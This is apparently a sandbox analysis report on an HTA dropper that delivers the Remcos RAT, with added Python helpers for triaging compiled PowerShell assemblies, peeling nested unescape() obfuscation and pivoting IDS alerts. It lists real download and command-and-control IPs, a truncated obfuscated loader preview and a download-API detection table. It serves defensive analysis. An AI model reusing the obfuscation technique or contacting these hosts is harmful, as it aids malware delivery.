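    r'\[DllImport\(\s*"(?P<dll>[^"]+)"(?P<attrs>[^\]]*)\]\s*'
    r'(?:public|private|internal|protected)?\s*static\s+extern\s+'
    r'[\w.<>\[\]]+\s+(?P<func>\w+)\s*\(', re.DOTALL)
ENTRY_RE = re.compile(r'EntryPoint\s*=\s*"([^"]+)"')

# Win32 entry points that fetch content from a URL (assumed table): a stub to one of
# these inside an Add-Type assembly is the download primitive of a download-and-execute chain.
DOWNLOAD_APIS = {
    "urlmon": ("URLDownloadToFile", "URLDownloadToCacheFile", "URLOpenBlockingStream"),
    "wininet": ("InternetOpenUrl", "InternetReadFile", "HttpOpenRequest"),
    "winhttp": ("WinHttpOpenRequest", "WinHttpReadData"),
}


def tokenize(cmdline):
    """Split a csc response line on unquoted whitespace and drop the quotes."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_csc_cmdline(cmdline):
    """Return target kind, output path, referenced assemblies, other switches and source files."""
    opts = {"target": None, "out": None, "references": [], "flags": [], "sources": []}
    for tok in tokenize(cmdline):
        low = tok.lower()
        if low.startswith(("/t:", "/target:")):
            opts["target"] = tok.split(":", 1)[1]
        elif low.startswith("/out:"):
            opts["out"] = tok.split(":", 1)[1]
        elif low.startswith(("/r:", "/reference:")):
            opts["references"].append(tok.split(":", 1)[1])
        elif tok.startswith("/"):
            opts["flags"].append(tok)
        else:
            opts["sources"].append(tok)
    return opts


def find_pinvokes(source):
    """Return (module, imported function) pairs; EntryPoint overrides the C# method name."""
    found = []
    for m in PINVOKE_RE.finditer(source):
        entry = ENTRY_RE.search(m.group("attrs"))
        found.append((m.group("dll"), entry.group(1) if entry else m.group("func")))
    return found


def odd_casing(module):
    """Heuristic: a module name that is neither lower, UPPER nor Capitalised (e.g. URLMOn.DLL)
    is typical of string-signature evasion, since the loader is case-insensitive anyway."""
    stem = module.rsplit(".", 1)[0]
    return stem not in (stem.lower(), stem.upper(), stem.capitalize())


def triage(cmdline, source=None):
    """Combine both artifacts into a list of indicator tags (empty list = nothing notable)."""
    findings = []
    opts = parse_csc_cmdline(cmdline)
    if opts["out"] and ADDTYPE_OUT_RE.search(opts["out"]):
        findings.append("addtype-temp-layout")
    if any(r.lower().endswith("system.management.automation.dll") for r in opts["references"]):
        findings.append("references-powershell-automation")   # csc was driven by PowerShell
    for dll, func in find_pinvokes(source or ""):
        stem = re.sub(r"\.dll$", "", dll.lower())
        if any(func.lower().startswith(api.lower()) for api in DOWNLOAD_APIS.get(stem, ())):
            findings.append(f"pinvoke-download-api:{dll}!{func}")
        if odd_casing(dll):
            findings.append(f"dllimport-case-anomaly:{dll}")
    return findings


if __name__ == "__main__":
    for tag in triage(SAMPLE_CMDLINE, SAMPLE_SOURCE):
        print(tag)
```

On a live host the same two inputs are the `<random>.cmdline` and `<random>.0.cs` files that sit beside the compiled DLL under `%LOCALAPPDATA%\Temp`; they are plain text and survive after the DLL has been loaded, so collecting them gives a readable statement of what the assembly can do even when the originating PowerShell command line was encoded or obfuscated.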
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Google Chrome extension, version 3
Category:dropped
Size (bytes):135771
Entropy (8bit):7.802585890890899
Encrypted:false
SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:DA75BB05D10ACC967EECAAC040D3D733
SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:false
Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (372), with CRLF line terminators
Category:dropped
Size (bytes):140880
Entropy (8bit):3.673474644726778
Encrypted:false
SSDEEP:3072:sK4Og9oq843Inb8CU3OuunFFKCLAgt5pKQGwm:sOaGb8CUxuFs
MD5:C9B675B1514C024221535D4BDE6F6C69
SHA1:24594969BC105AEC0E15F109872193C030C0C102
SHA-256:E58BA960C159E99A12D4C50D3FFFE4A9EE2B50F08E702BC90D4E18B7AA9421FB
SHA-512:328E530EB7ABB045624D793FAF89CCC1A16E0C1A1C58E3A33D2CB4BD955742D511F3B07D183423A7643A57579CDD0591D968640D106FAD5D1C6A4B1AD4C494D8
Malicious:true
Preview (decoded from UTF-16LE; the sandbox preview is truncated):
Function atrocemente(ByVal alternipenne, ByVal emparedar, ByVal maiorino)
    Dim fuliginoso
    fuliginoso = InStr(alternipenne, emparedar)

    Do While fuliginoso > 0
        alternipenne = Left(alternipenne, fuliginoso - 1) & maiorino & Mid(alternipenne, fuliginoso + Len(emparedar))
        fuliginoso = InStr(fuliginoso + Len(maiorino), alternipenne, emparedar)
    Loop

    atrocemente = alternipenne
End Function


private function ReadStdIn()
    while Not stdIn.
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):2.003189103245998
TrID:
File name:seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
File size:182'592 bytes
MD5:2d71e3e87e2ea2945dcc2571b74fdb43
SHA1:a338df9a850b1c37528e1b517786285c216cf5e0
SHA256:0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
SHA512:8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab
SSDEEP:96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ
TLSH:1E04C961ED398CDCB3DC9A9776FC36D834BC834B97EB4E82811B7846E86238C90C0555
File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252
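The File Content Preview shows the HTA's obfuscation: a variable m holds a URL-encoded string which, once unescaped, is itself a script calling document.write(unescape("...")) on a string encoded one level deeper (%3C, then %253C, then %25253C). Each unescape() strips one level from everything below it, so the whole chain decodes by repeating unescape-and-unwrap until no wrapper remains. The decoder below is an added example and not part of the report or the sample; the nested input it works on is constructed with build_sample() to have the same shape as the preview, and the innermost stage is a labelled placeholder, not the real payload.

```python
"""Peel nested document.write(unescape("...")) layers from an HTA dropper.

Added example, not part of the sandbox report. The sample decoded here is
CONSTRUCTED by build_sample(); only its shape follows the report's preview.
"""
import re
from urllib.parse import quote, unquote

# Outer assignment as in the preview:  m='%3Cscript%3E...'
OUTER = re.compile(r"\bm\s*=\s*'(?P<payload>[^']*)'")
# One wrapper layer:  document.write(unescape("<payload>"))
WRAPPER = re.compile(
    r'document\.write\(\s*unescape\(\s*"(?P<payload>[^"]*)"\s*\)\s*\)', re.DOTALL
)


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX first, then %XX as single Latin-1 bytes; '+' stays."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def peel(hta: str, max_layers: int = 50):
    """Return (layers, innermost): every decoded wrapper in order, then the final plaintext."""
    start = OUTER.search(hta) or WRAPPER.search(hta)
    if start is None:
        return [], hta                      # nothing to peel
    current = start.group("payload")
    layers = []
    for _ in range(max_layers):
        decoded = js_unescape(current)      # strips exactly one encoding level
        layers.append(decoded)
        inner = WRAPPER.search(decoded)
        if inner is None:
            return layers, decoded
        current = inner.group("payload")
    raise ValueError(f"more than {max_layers} layers; refusing to continue")


# --- constructed sample, mirroring the preview's shape ------------------------
def js_escape(s: str) -> str:
    """Close enough to JavaScript escape() for ASCII input (only used to build the sample)."""
    return quote(s, safe="")


def wrap(inner_html: str) -> str:
    """One obfuscation layer: <script><!-- document.write(unescape("...")) //--></script>."""
    return '<script>\n<!--\ndocument.write(unescape("%s"))\n//-->\n</script>' % js_escape(inner_html)


def build_sample(final_html: str, depth: int) -> str:
    """Nest final_html in `depth` wrappers and emit the outer m='...' loader."""
    html = final_html
    for _ in range(depth):
        html = wrap(html)
    return "<script language=JavaScript>m='%s';document.write(unescape(m));</script>" % js_escape(html)


FINAL_STAGE = "<script>/* constructed placeholder for the innermost stage */</script>"

if __name__ == "__main__":
    sample = build_sample(FINAL_STAGE, 3)
    print(sample[:110] + "...")
    layers, innermost = peel(sample)
    print(f"{len(layers)} unescape() passes")
    print(innermost)
```

Running it prints an outer string beginning exactly like the report's preview (m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript...), then four decode passes for three wrappers, then the placeholder. On a real sample the loop stops at the first layer that is no longer a document.write(unescape()) wrapper, which is where the actual script logic (VBScript or JScript) begins and static analysis can continue.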
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T16:52:10.021973+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 23.94.171.138 | 80 | 192.168.2.8 | 55648 | TCP
2024-11-18T16:52:23.601751+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.8 | 49705 | 23.94.171.138 | 80 | TCP
2024-11-18T16:52:38.759543+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.215.209.78 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-18T16:52:56.510461+0100 | 2858796 | ETPRO MALWARE ReverseLoader Payload Request (GET) M1 | 1 | 192.168.2.8 | 55648 | 23.94.171.138 | 80 | TCP
2024-11-18T16:52:56.864013+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 23.94.171.138 | 80 | 192.168.2.8 | 55648 | TCP
2024-11-18T16:52:56.864013+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 23.94.171.138 | 80 | 192.168.2.8 | 55648 | TCP
2024-11-18T16:53:21.663046+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 55649 | 192.227.228.36 | 14645 | TCP
2024-11-18T16:53:23.333996+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 55650 | 192.227.228.36 | 14645 | TCP
2024-11-18T16:53:23.817150+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.8 | 55651 | 178.237.33.50 | 80 | TCP
2024-11-18T16:53:23.948023+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 55652 | 192.227.228.36 | 14645 | TCP
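The alert table records Source and Dest as they appear in the packet that fired the rule, so for server-to-client signatures (the Base64 payload and EXE-inbound hits) the attacker host is in the Source column, while for the GET requests and the JA3 matches it is in the Dest column. Pulling indicators from the Dest column alone would therefore miss the download server on three of its five alerts. The script below is an added example, not part of the report; its ALERTS rows are transcribed from the table above, and LOCAL_NET is an assumption derived from the analysis host's address 192.168.2.8. It normalises every alert onto its non-local end and summarises the result per external peer.

```python
"""Pivot Suricata alerts onto their external peer and summarise per endpoint.

Added example, not part of the sandbox report. ALERTS is transcribed from the
report's IDS table; LOCAL_NET is an ASSUMPTION (the sandbox host is 192.168.2.8).
"""
from dataclasses import dataclass, field
from datetime import datetime
import ipaddress

LOCAL_NET = ipaddress.ip_network("192.168.2.0/24")   # assumption: sandbox LAN

# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port)
ALERTS = [
    ("2024-11-18T16:52:10.021973+0100", 2858295, "ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)", 1, "23.94.171.138", 80, "192.168.2.8", 55648),
    ("2024-11-18T16:52:23.601751+0100", 2858795, "ETPRO MALWARE ReverseLoader Payload Request (GET) M2", 1, "192.168.2.8", 49705, "23.94.171.138", 80),
    ("2024-11-18T16:52:38.759543+0100", 2049038, "ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2", 1, "142.215.209.78", 443, "192.168.2.8", 49706),
    ("2024-11-18T16:52:56.510461+0100", 2858796, "ETPRO MALWARE ReverseLoader Payload Request (GET) M1", 1, "192.168.2.8", 55648, "23.94.171.138", 80),
    ("2024-11-18T16:52:56.864013+0100", 2020424, "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1", 1, "23.94.171.138", 80, "192.168.2.8", 55648),
    ("2024-11-18T16:52:56.864013+0100", 2020425, "ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2", 1, "23.94.171.138", 80, "192.168.2.8", 55648),
    ("2024-11-18T16:53:21.663046+0100", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1, "192.168.2.8", 55649, "192.227.228.36", 14645),
    ("2024-11-18T16:53:23.333996+0100", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1, "192.168.2.8", 55650, "192.227.228.36", 14645),
    ("2024-11-18T16:53:23.817150+0100", 2803304, "ETPRO MALWARE Common Downloader Header Pattern HCa", 3, "192.168.2.8", 55651, "178.237.33.50", 80),
    ("2024-11-18T16:53:23.948023+0100", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1, "192.168.2.8", 55652, "192.227.228.36", 14645),
]


@dataclass
class Peer:
    ip: str
    port: int
    first_seen: datetime
    last_seen: datetime
    sids: set = field(default_factory=set)
    signatures: set = field(default_factory=set)
    inbound_hits: int = 0     # external host was the packet source (server->client rule)
    outbound_hits: int = 0    # sandbox host was the packet source (client->server rule)
    max_severity: int = 99    # Suricata priority: 1 is the most severe


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def external_end(src_ip, src_port, dst_ip, dst_port):
    """(ip, port, inbound) for the non-local end of an alert, or None if there is none."""
    src_local = ipaddress.ip_address(src_ip) in LOCAL_NET
    dst_local = ipaddress.ip_address(dst_ip) in LOCAL_NET
    if src_local and not dst_local:
        return dst_ip, dst_port, False
    if dst_local and not src_local:
        return src_ip, src_port, True
    return None


def pivot(alerts):
    """Group alerts by external (ip, port), regardless of which column held the host."""
    peers = {}
    for ts, sid, sig, sev, sip, sport, dip, dport in alerts:
        end = external_end(sip, sport, dip, dport)
        if end is None:
            continue
        ip, port, inbound = end
        when = parse_ts(ts)
        p = peers.get((ip, port))
        if p is None:
            p = peers[(ip, port)] = Peer(ip, port, when, when)
        p.first_seen, p.last_seen = min(p.first_seen, when), max(p.last_seen, when)
        p.sids.add(sid)
        p.signatures.add(sig)
        p.max_severity = min(p.max_severity, sev)
        if inbound:
            p.inbound_hits += 1
        else:
            p.outbound_hits += 1
    return peers


def c2_candidates(peers, marker="Remcos"):
    """Peers whose signatures name the RAT family; relies only on Suricata's rule text."""
    return sorted(k for k, p in peers.items() if any(marker in s for s in p.signatures))


def timeline(peers):
    """Peers in order of first alert: the staging chain as the IDS saw it."""
    return [(p.first_seen.isoformat(), p.ip, p.port)
            for p in sorted(peers.values(), key=lambda p: p.first_seen)]


if __name__ == "__main__":
    peers = pivot(ALERTS)
    for ts, ip, port in timeline(peers):
        p = peers[(ip, port)]
        print(f"{ts}  {ip}:{port}  in={p.inbound_hits} out={p.outbound_hits} "
              f"prio={p.max_severity} sids={sorted(p.sids)}")
    print("Remcos C2 candidates:", c2_candidates(peers))
```

Over the table above this yields four external peers in staging order: 23.94.171.138:80 (five alerts, three of them with the server as packet source), 142.215.209.78:443, 192.227.228.36:14645 (three JA3 matches, the only Remcos-labelled peer) and 178.237.33.50:80, whose single hit is a priority-3 generic header pattern and deserves less weight than the others when the list is turned into blocks.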
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 16:52:22.911870003 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:22.917033911 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:22.917129040 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:22.917340040 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:22.922883034 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601640940 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601675987 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601691008 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601751089 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.601784945 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601785898 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.601802111 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601819038 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601825953 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.601838112 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.601857901 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.601885080 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.602257013 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.602279902 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.602303028 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.602303982 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.602330923 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.602360010 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.606753111 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.606801033 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.606820107 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.606852055 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.720274925 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720307112 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720324039 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720496893 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720495939 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.720495939 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.720690966 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720741987 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.720783949 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720951080 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.720956087 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720972061 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.720988035 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.721031904 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.721129894 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.721227884 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.721276999 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.721316099 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.721503019 CET | 49705 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:23.721541882 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:23.721560001 CET | 80 | 49705 | 23.94.171.138 | 192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721596956 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721678972 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721728086 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721745014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721782923 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721798897 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722214937 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722254992 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722266912 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722270966 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722294092 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722302914 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722522020 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722541094 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722606897 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722771883 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723059893 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723110914 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723114967 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723268986 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761450052 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761554956 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761569023 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761615992 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761965990 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762015104 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762267113 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762315035 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839653015 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839672089 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839761972 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839814901 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839832067 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839883089 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840024948 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840039968 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840056896 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840063095 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840075970 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840099096 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840399027 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840415001 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840430021 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840447903 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840452909 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840466976 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840486050 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840857983 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840873957 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840889931 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840909958 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840924025 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840930939 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841170073 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841221094 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841274977 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841290951 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841317892 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841330051 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841635942 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841650963 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841665030 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841681004 CET804970523.94.171.138192.168.2.8
